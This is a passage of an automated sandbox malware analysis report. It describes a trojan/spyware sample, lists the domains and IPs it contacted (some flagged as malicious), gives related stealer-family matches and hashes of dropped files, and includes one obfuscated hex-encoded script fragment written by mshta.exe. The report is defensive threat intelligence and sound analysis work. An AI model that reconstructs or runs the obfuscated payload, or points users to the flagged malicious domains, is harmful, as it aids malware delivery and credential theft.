                                                                                                                                                                                                    https://www.homedepot.com/mycart/homechrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://docs.google.com/document/?usp=installed_webappchrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://beastacademy.com/checkout/cartchrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://tr.snapchat.com/cm/i?pid=93f19646-2418-418d-98af-f244ebb7c1ccchrome.exe, 00000009.00000002.57291479755.0000781C02C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289869509.0000781C02A60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://www.belk.com/shopping-bag/chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://www.neimanmarcus.com/checkout/cart.jspchrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://mail.google.com/mail/chrome.exe, 00000009.00000002.57296352145.0000781C033D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://myaccount.google.com/shielded-email2Bchrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://www.autoitscript.com/chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://myshop.amplify.com/cartchrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          https://www.brownells.com/aspx/store/cart.aspxchrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://www.google.com/tools/feedback/chrome/__submitchrome.exe, 00000009.00000002.57287720778.0000781C0264C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57223675846.0000781C0264C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXEtall.exechrome.exe, 00000009.00000002.57294454286.0000781C0313C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://savecoupons.shop/sipowershell.exe, 00000003.00000002.56226696181.00000000081B9000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  https://www.basspro.com/shop/AjaxOrderItemDisplayViewchrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                    239.255.255.250
                                                                                                                                                                                                                                    unknownReserved
                                                                                                                                                                                                                                    unknownunknownfalse
                                                                                                                                                                                                                                    172.67.223.7
                                                                                                                                                                                                                                    savecoupons.shopUnited States
                                                                                                                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                    104.21.96.1
                                                                                                                                                                                                                                    surmisehotte.clickUnited States
                                                                                                                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                    104.21.37.173
                                                                                                                                                                                                                                    journal.liveview.pwUnited States
                                                                                                                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                    172.217.15.196
                                                                                                                                                                                                                                    www.google.comUnited States
                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                    IP
                                                                                                                                                                                                                                    192.168.11.20
                                                                                                                                                                                                                                    127.0.0.1
                                                                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                    Analysis ID:1579348
                                                                                                                                                                                                                                    Start date and time:2024-12-21 21:02:33 +01:00
                                                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                    Overall analysis duration:0h 9m 34s
                                                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                                                    Cookbook file name:defaultwindowscmdlinecookbook.jbs
                                                                                                                                                                                                                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                                                                                                                    Number of analysed new started processes analysed:13
                                                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                                                    Classification:mal100.troj.spyw.evad.win@26/9@5/7
                                                                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                                                                    • Successful, ratio: 50%
                                                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                                                    • Successful, ratio: 89%
                                                                                                                                                                                                                                    • Number of executed functions: 177
                                                                                                                                                                                                                                    • Number of non-executed functions: 21
                                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                                                                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 192.178.50.67, 172.217.2.206, 142.251.107.84, 142.250.217.238, 142.250.217.206, 142.250.189.142, 172.217.3.78
                                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                                                                                                                                                                                                                    • Execution Graph export aborted for target mshta.exe, PID 2044 because there are no executed function
                                                                                                                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 2576 because it is empty
                                                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                                                                    15:04:41API Interceptor81x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    239.255.255.250file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                      https://gogvo.com/redir.php?url=https://atratejarat.com/wp-content/red/DhmgvVGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                          https://shibe-rium.net/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                Fatura227Pendente576.pdf674.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  https://logistics.sheincorp.cn/#/loginGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                      172.67.223.7h8lD4SWL35.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                      • www.worldsourcecloud.com/nsag/?AjU=B6Y2gXStMnwX5XGKVuP/TmarUdW4V+m6LGGQinzk50iDzibEzn0GLWf4ECTuyrFUZI2G&njndiL=9rtTFPBhfVt4
                                                                                                                                                                                                                                                      Nz7NA3F7z7.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                      • www.worldsourcecloud.com/nsag/?Ntfttf=nlvt&Bd68427=B6Y2gXStMnwX5XGKVuP/TmarUdW4V+m6LGGQinzk50iDzibEzn0GLWf4EBz+9KVsHtfB
                                                                                                                                                                                                                                                      104.21.96.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                                                                                                                                                      • pelisplus.so/administrator/index.php
                                                                                                                                                                                                                                                      Recibos.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                      • www.mffnow.info/1a34/
                                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      • 104.21.63.229
                                                                                                                                                                                                                                                      LightSpoofer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 104.26.9.59
                                                                                                                                                                                                                                                      Solara-3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.197.170
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                                      • 104.21.67.146
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      • 104.21.67.146
                                                                                                                                                                                                                                                      Rechnung736258.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.16.1
                                                                                                                                                                                                                                                      https://shibe-rium.net/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 104.18.18.237
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                      • 172.67.197.170
                                                                                                                                                                                                                                                      CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      • 104.21.63.229
                                                                                                                                                                                                                                                      LightSpoofer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 104.26.9.59
                                                                                                                                                                                                                                                      Solara-3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.197.170
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                                      • 104.21.67.146
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      • 104.21.67.146
                                                                                                                                                                                                                                                      Rechnung736258.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.16.1
                                                                                                                                                                                                                                                      https://shibe-rium.net/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 104.18.18.237
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                      • 172.67.197.170
                                                                                                                                                                                                                                                      CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      • 104.21.63.229
                                                                                                                                                                                                                                                      LightSpoofer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 104.26.9.59
                                                                                                                                                                                                                                                      Solara-3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.197.170
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                                      • 104.21.67.146
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      • 104.21.67.146
                                                                                                                                                                                                                                                      Rechnung736258.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.16.1
                                                                                                                                                                                                                                                      https://shibe-rium.net/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 104.18.18.237
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                      • 172.67.197.170
                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0eRechnung736258.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.37.173
                                                                                                                                                                                                                                                      Company Information.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 104.21.37.173
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                      • 104.21.37.173
                                                                                                                                                                                                                                                      Fatura227Pendente576.pdf674.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 104.21.37.173
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                      • 104.21.37.173
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                      • 104.21.37.173
                                                                                                                                                                                                                                                      B06 Chair + Blocker.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 104.21.37.173
                                                                                                                                                                                                                                                      B06 Chair + Blocker.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 104.21.37.173
                                                                                                                                                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1Solara-3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                                      Rechnung736258.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                                      Navan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                                      BigProject.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                                      Full-Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                                      jqplot.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                                      37f463bf4616ecd445d4a1937da06e19LightSpoofer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 172.67.223.7
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                                      • 172.67.223.7
                                                                                                                                                                                                                                                      Rechnung736258.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.223.7
                                                                                                                                                                                                                                                      Company Information.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 172.67.223.7
                                                                                                                                                                                                                                                      Navan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.223.7
                                                                                                                                                                                                                                                      BigProject.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.223.7
                                                                                                                                                                                                                                                      setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 172.67.223.7
                                                                                                                                                                                                                                                      jqplot.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 172.67.223.7
                                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):642968
                                                                                                                                                                                                                                                      Entropy (8bit):6.145372514924513
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6144:5/SWP1PkrKeNSuBev+ezCCsese4tAeLkepSBIkYMJMelek2efeFOelI/:5PPBM2
                                                                                                                                                                                                                                                      MD5:543530C3B4038086637ACCF9D95397D6
                                                                                                                                                                                                                                                      SHA1:617115DDA0F8553D7DD5CEE8D0DC2DDEC461C59C
                                                                                                                                                                                                                                                      SHA-256:D070FAD55BE0D3269DBEBB1DE70652D82D48F0AD849F960D27D3E71018EB208C
                                                                                                                                                                                                                                                      SHA-512:45F190D4ADE1A1AF105F93566CFE34285A47FC9A1E2124C7B9EC787A262F8085A8A3659276A2A0A8DBD4243602AF41A6AA89E77ADE405FB4DF5A2A6865D56DB2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:66D75V6ed63S74T69B6fN6ev20D4eO57j6aZ4eK28h65L4fz46a5ad64s29I7bS76n61r72n20y66g6cp6dM4fp3dy20t27y27A3be66f6fs72B20S28S76N61D72d20I52l59v4co41u20r3dR20G30o3bS52j59E4ca41P20e3cp20U65m4fL46B5aG64E2eV6ck65Z6eg67B74T68y3bH20K52e59E4cp41f2bF2bs29J7bl76x61u72i20K47a4fP77w62D4dP73O20L3dx20f53B74C72W69D6eQ67K2eP66O72p6fy6dI43g68H61E72z43k6fk64Y65x28L65B4fO46H5aY64u5bu52V59c4cc41m5dF20m2dK20e33d38C33T29c3bp66h6ct6dX4fH20v3da20d66S6cK6dw4fT20f2bp20O47m4fe77m62u4dy73I7dV72o65n74l75D72t6eW20W66d6ca6dw4fR7dH3bj76P61S72d20G66L6cy6dQ4fb20L3dg20J4eG57P6aX4eX28z5br34H39U35T2cT34s39G34m2cD35B30D32H2cp34j38z34B2cY34F39y37U2cB34f39j38A2cs34u38d37H2cc34x38e34y2cy34d39j31p2cw34o39Q31X2cL34r32D39J2cu34J38m34b2cg35H30i33K2cZ34D38y34L2cY34U31b35Y2cO34z32K38G2cX35F30I32L2cA34K31F35k2co34b33I32K2cc34Z31G35i2cH34C32a38U2cO34T38Y34v2cf34Y39Q35b2cM34r31I35M2ch34w36l38o2cA34a39a33V2cC34y39V37y2cu34n38i34y2cO34s39R38M2cY34p39r39D2cg34M39g37c2cu34d38X38x2cS34v38c32g2cn34R39i39h2cb34F38S34Q2cy34a38A33r2cp34R31M35T2ca34w3
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):5829
                                                                                                                                                                                                                                                      Entropy (8bit):4.901113710259376
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                                                                                                                                                                                      MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                                                                                                                                                                                      SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                                                                                                                                                                                      SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                                                                                                                                                                                      SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                                                                                                      Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:@...e...........................................................
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (9542)
                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                      Size (bytes):9547
                                                                                                                                                                                                                                                      Entropy (8bit):5.777233050028666
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:0pN6666xgjH3a95WZ6US4YN7iv5gOiV9kmSCP1UugaNnH2MU1RHd/X:0j6666AXa/WZkWlGqC6uLHbU1xB
                                                                                                                                                                                                                                                      MD5:DAA95E66C0E604EF9A0AEC3ABF47ADB0
